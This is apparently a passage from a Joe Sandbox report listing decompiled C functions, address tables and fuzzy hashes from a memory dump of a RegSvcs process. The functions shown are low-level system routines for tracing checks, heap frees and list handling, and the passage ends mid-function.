0x00fe3bab
0x00fe3bb5
0x00fe3bb9
0x01026298
0x00fe3bbf
0x00fe3bc2
0x00fe3bc3
0x00fe3bc9
0x00fe3bca
0x00fe3bcc
0x00fe3bcd
0x00fe3bd4
0x00fe3bd6
0x00fe3bdb
0x00fe3bea
0x00fe3bf7
0x00fe3bfb
0x00fe3bff
0x00fe3c09
0x00fe3c0a
0x00fe3c0b
0x00fe3c0f
0x00fe3c14
0x00fe3c18
0x00fe3c18
0x00fe3bfb
0x00fe3c1b
0x00fe3c30
0x00fe3c30
0x00fe3c3d

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cc378bf769b2b1b2b32116950f85a95db6f8226f1697819a78bab37ba1e4499
Instruction ID: 96b8885381a0c519767a4d783db669e488ae24689e95caae9103591bdfef647f
Opcode Fuzzy Hash: 3cc378bf769b2b1b2b32116950f85a95db6f8226f1697819a78bab37ba1e4499
Instruction Fuzzy Hash: CD21C2B2A00508AFC710DF58CD85F6ABBBDFF44708F250069EA09AB251D776EE15DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01036CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01036CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E00FD7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E00FD7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0xf95c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E00FEF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E00FEF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01037016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L00FD2400( &_v52);
								}
								_t21 = L00FD2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x01036cfb
0x01036d00
0x01036d02
0x01036d06
0x01036d0a
0x01036d0e
0x01036d19
0x01036d2b
0x01036d1b
0x01036d24
0x01036d24
0x01036d33
0x01036d39
0x01036d46
0x01036d4f
0x01036d61
0x01036d51
0x01036d5a
0x01036d5a
0x01036d69
0x01036d6b
0x01036d6d
0x01036d6f
0x01036d6f
0x01036d74
0x01036d79
0x01036d7a
0x01036d7f
0x01036d82
0x01036d88
0x01036d89
0x01036d90
0x01036d94
0x01036da7
0x01036db1
0x01036db1
0x01036dbb
0x01036dbb
0x01036d90
0x01036d69
0x01036d46
0x01036dc6

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f45fadcdbbca1b61695c5dcaf11158947d1c10f81b98bff2671da3413d158f
Instruction ID: f3ec9f029562a76af0d1537510fc53f9b8a8dc2a50667c7452ff377de0eea46f
Opcode Fuzzy Hash: 06f45fadcdbbca1b61695c5dcaf11158947d1c10f81b98bff2671da3413d158f
Instruction Fuzzy Hash: 2121C572904745ABD711EF29D948B6BBBECAFC1740F0805A6FE80C7252E735D648C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0108070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0108070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E010807DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0107AFDE( &_v8,  &_v12);
					E01081293(_t38, _v28, _t60);
					if(E00FD7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E010714FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0108071b
0x01080724
0x01080734
0x01080738
0x0108074b
0x0108074b
0x01080753
0x01080753
0x01080759
0x0108075d
0x01080774
0x01080779
0x0108077d
0x01080789
0x01080795
0x010807a7
0x01080797
0x010807a0
0x010807a0
0x010807af
0x010807c4
0x010807cd
0x010807cd
0x010807af
0x010807dc

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 34f532add6e3c3476a1b50f55d0bd3455188500425c5169ff1c1204e4d43c562
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 1521D3367082009FD715EF18C880AAABBE5FFD4350F048569F9D58B389D630D919CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FDAE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00FDAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E00FD7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E00FD7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E00FD7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E00FD7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01037794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x00fdae78
0x00fdae7c
0x00fdae7e
0x00fdae81
0x00fdae86
0x00fdae8d
0x01022691
0x00fdae93
0x00fdae93
0x00fdae93
0x00fdae98
0x00fdae9d
0x010226a2
0x010226b4
0x010226a4
0x010226ad
0x010226ad
0x010226b9
0x00000000
0x010226bb
0x00000000
0x010226bb
0x00fdaea3
0x00fdaea3
0x00fdaea3
0x00fdaeaa
0x010226c0
0x010226c9
0x010226c9
0x00fdaeb3
0x010226d4
0x010226e1
0x00000000
0x00000000
0x010226e7
0x010226ee
0x010226f0
0x010226f9
0x010226f9
0x01022702
0x01022708
0x01022708
0x0102270b
0x0102270f
0x01022711
0x01022711
0x01022725
0x01022725
0x00000000
0x00fdaeb9
0x00fdaeb9
0x00fdaebf
0x00fdaebf
0x00fdaeb3

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 2f1bf7d7f5349f2b16b7ab4ff617236bd086ce9ec704db0c87542b491b72ae8c
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: B82123326056918FE7269BA9C948B2537EAEF49350F1D00E2ED448B7A3E738DC40D6A1

Uniqueness

Uniqueness Score: -1.00%

Function 01037794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E01037794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x10a7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L00FD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E00FFF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E00FD7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E00FF9AE0();
					_t24 = L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x01037799
0x0103779a
0x0103779b
0x010377a3
0x010377ab
0x010377ae
0x010377b1
0x010377b1
0x010377bf
0x010377c4
0x010377c8
0x010377ce
0x010377d4
0x010377e0
0x010377e0
0x010377d6
0x010377d6
0x010377de
0x00000000
0x00000000
0x010377de
0x010377e5
0x010377f0
0x010377f3
0x010377f6
0x010377fd
0x01037800
0x0103780c
0x01037818
0x0103782b
0x0103781a
0x01037823
0x01037823
0x01037830
0x01037831
0x01037838
0x0103783d
0x0103783e
0x0103784f
0x0103784f
0x0103785a

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 879b3a2ed5217ab9daf990d5a225fe9316bb38076bc92c4fe7b16b03e7d81911
Instruction ID: 77dc95502feefdaf4e8474610d52f9983af7e764e2bca79395996919ff7fb2f0
Opcode Fuzzy Hash: 879b3a2ed5217ab9daf990d5a225fe9316bb38076bc92c4fe7b16b03e7d81911
Instruction Fuzzy Hash: 5121A1B2500604ABC725DF69DC80E6BBBEDEF88740F14456DF64AC7750E638E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00FEFD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FEFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E00FC76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L00FD4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x00fefd9b
0x00fefda0
0x00fefda1
0x00fefdab
0x00fefdad
0x00fefdb0
0x00fefdb8
0x00fefe0f
0x00fefde6
0x00fefde9
0x00fefdec
0x0102c0c0
0x00fefdfe
0x00fefe06
0x00fefe06
0x0102c0c8
0x00fefe2d
0x00fefe2d
0x00000000
0x00fefe2d
0x0102c0d1
0x0102c0e0
0x0102c0e5
0x0102c0e5
0x0102c0e8
0x00000000
0x0102c0e8
0x00fefdf4
0x00000000
0x00000000
0x00fefdf6
0x00fefdfa
0x00fefe1a
0x00fefe1f
0x00fefe1f
0x00fefdfc
0x00000000
0x00fefdfc
0x00fefdcc
0x00fefdd0
0x00fefe26
0x00000000
0x00fefe26
0x00fefdd8
0x00fefddb
0x00fefddd
0x00fefde0
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 309ebf90562637304a0d0a96ed2a03a665e29f2854ce2d2a5c7e4fce3afbc425
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 8A217C72A00A80DBD731CF0ACA40F66FBE5EB94B20F24857EE94587721D734AC04EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FF5A69 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00FF5A69(intOrPtr* __ecx, void* __edx) {
				void* __ebx;
				signed int _t18;
				char* _t22;
				char* _t28;
				signed char _t34;
				signed char _t35;
				void* _t47;
				intOrPtr* _t48;

				_t47 = __edx;
				_t48 = __ecx;
				if(( *0x10a84b4 & 0x00000004) == 0) {
					_t18 =  *(__ecx + 0x5c) & 0x0000ffff;
					if(_t18 > 0x70 ||  *((intOrPtr*)(__ecx + 0x50)) < ( *(0xf9ade8 + _t18 * 2) & 0x0000ffff) << 4) {
						goto L1;
					} else {
						asm("sbb bl, bl");
						_t35 = _t34 & 0x00000001;
						L2:
						if(E00FD7D50() != 0) {
							_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						} else {
							_t22 = 0x7ffe038a;
						}
						if( *_t22 != 0) {
							L16:
							if(_t35 != 0) {
								E01071751(_t35,  *((intOrPtr*)( *((intOrPtr*)( *_t48 + 0xc)) + 0xc)),  *((intOrPtr*)(_t47 + 4)),  *(_t48 + 0x5c) & 0x0000ffff);
							}
							goto L8;
						} else {
							if(E00FD7D50() != 0) {
								_t28 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t28 = 0x7ffe0380;
							}
							if( *_t28 != 0) {
								if(( *( *[fs:0x30] + 0x240) & 0x00000001) == 0) {
									goto L8;
								}
								goto L16;
							} else {
								L8:
								return _t35;
							}
						}
					}
				}
				L1:
				_t35 = 0;
				goto L2;
			}

0x00ff5a73
0x00ff5a75
0x00ff5a77
0x00ff5ab7
0x00ff5abe
0x00000000
0x00ff5ad2
0x0102fb3a
0x0102fb3c
0x00ff5a7b
0x00ff5a82
0x0102fb4c
0x00ff5a88
0x00ff5a88
0x00ff5a88
0x00ff5a90
0x0102fb7c
0x0102fb7e
0x0102fb94
0x0102fb94
0x00000000
0x00ff5a96
0x00ff5a9d
0x0102fb5f
0x00ff5aa3
0x00ff5aa3
0x00ff5aa3
0x00ff5aab
0x0102fb76
0x00000000
0x00000000
0x00000000
0x00ff5ab3
0x00ff5ab3
0x00ff5ab6
0x00ff5ab6
0x00ff5aab
0x00ff5a90
0x00ff5abe
0x00ff5a79
0x00ff5a79
0x00000000

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fb01e27119d001fe23d4ea6df5b9dc99cab1f07324dcb0bacfb146025276975
Instruction ID: a08af10c00758e70724796aa3907d04b17ddc3118d95434364e91bef3e487f58
Opcode Fuzzy Hash: 3fb01e27119d001fe23d4ea6df5b9dc99cab1f07324dcb0bacfb146025276975
Instruction Fuzzy Hash: 7B115935241955CFD3268B2CD4E0775B3E4EF01B58F18019AEAC28B761D36DDC91E750

Uniqueness

Uniqueness Score: -1.00%

Function 00FB9240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00FB9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x108f708);
				E0100D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E00FF95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E00FF95D0();
				_t33 =  *0x10a84c4; // 0x0
				L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x10a84c4; // 0x0
				L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x10a84c4; // 0x0
				E00FD2280(L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x10a86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E00FF95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E00FF95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E00FB9325();
					_t50 =  *0x10a84c4; // 0x0
					return E0100D0D1(L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x00fb9240
0x00fb9242
0x00fb9247
0x00fb924c
0x00fb924e
0x00fb9255
0x00fb9257
0x00fb925a
0x00fb925f
0x00fb925f
0x00fb9266
0x00fb9271
0x00fb9276
0x00fb9279
0x00fb927e
0x00fb9295
0x00fb929a
0x00fb92b1
0x00fb92b6
0x00fb92d7
0x00fb92dc
0x00fb92e0
0x00fb92e6
0x00fb92e8
0x00fb92ee
0x00fb9332
0x00fb9333
0x00fb9337
0x00fb9338
0x00fb933a
0x00fb933a
0x00fb933d
0x00fb9342
0x00fb9342
0x00fb9345
0x00fb9349
0x00fb934e
0x00fb9352
0x00fb9357
0x00fb92f4
0x00fb92f4
0x00fb92f6
0x00fb92f9
0x00fb9300
0x00fb9306
0x00fb9324
0x00fb9324

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7f41138d53a0e962f9caa2ce11a103b17039e40b1eb48a1862a7767f226af644
Instruction ID: 5a689d793ba08a4d40d8c3dee22f2c3b40746150b8e1647a36abf3df02c1f6cb
Opcode Fuzzy Hash: 7f41138d53a0e962f9caa2ce11a103b17039e40b1eb48a1862a7767f226af644
Instruction Fuzzy Hash: 46217871045A00DFC322EF68CE01F59B7F9BF08304F48456DA1898A6A2DB79E941EF40

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00FEB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E00FD2280(_t12, 0x10a8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E00FF00C2(0x10a8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x00feb395
0x00feb3a2
0x00feb3a5
0x00feb3aa
0x00feb3b2
0x00feb3ba
0x00feb3bd
0x00feb3c0
0x00feb3c4
0x00feb3c9
0x0102a3e9
0x0102a3ed
0x0102a3f0
0x0102a3ff
0x0102a403
0x0102a409
0x00000000
0x00000000
0x0102a40b
0x0102a40b
0x0102a40f
0x0102a415
0x0102a423
0x0102a423
0x0102a415
0x00feb3d1
0x00feb3e8
0x00feb3e8
0x00feb3d9

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 997b58ecef45e02f08bad5d52b62489b0514a799bb6a87abea74d337461145f1
Instruction ID: 36af6690b0f24ff5ad8d55038ae57df19303c4b071fed6c3b92554dbc6c7c05c
Opcode Fuzzy Hash: 997b58ecef45e02f08bad5d52b62489b0514a799bb6a87abea74d337461145f1
Instruction Fuzzy Hash: 16116F377051109FCB199A55CD4262B7267EFC9330B28812AED56C7780DE359C01D6D0

Uniqueness

Uniqueness Score: -1.00%

Function 01044257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E01044257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x10908d0);
				E0100D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E010441E8(__ebx, __edi, __ecx, _t39);
				E00FCEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x10a87e4;
					_t18 =  *0x10a87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x10a5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x10a87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x10a87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L00FB7055(_t31 + 0xfffffff8);
								_t24 =  *0x10a87e0; // 0x0
								_t18 = _t24 - 1;
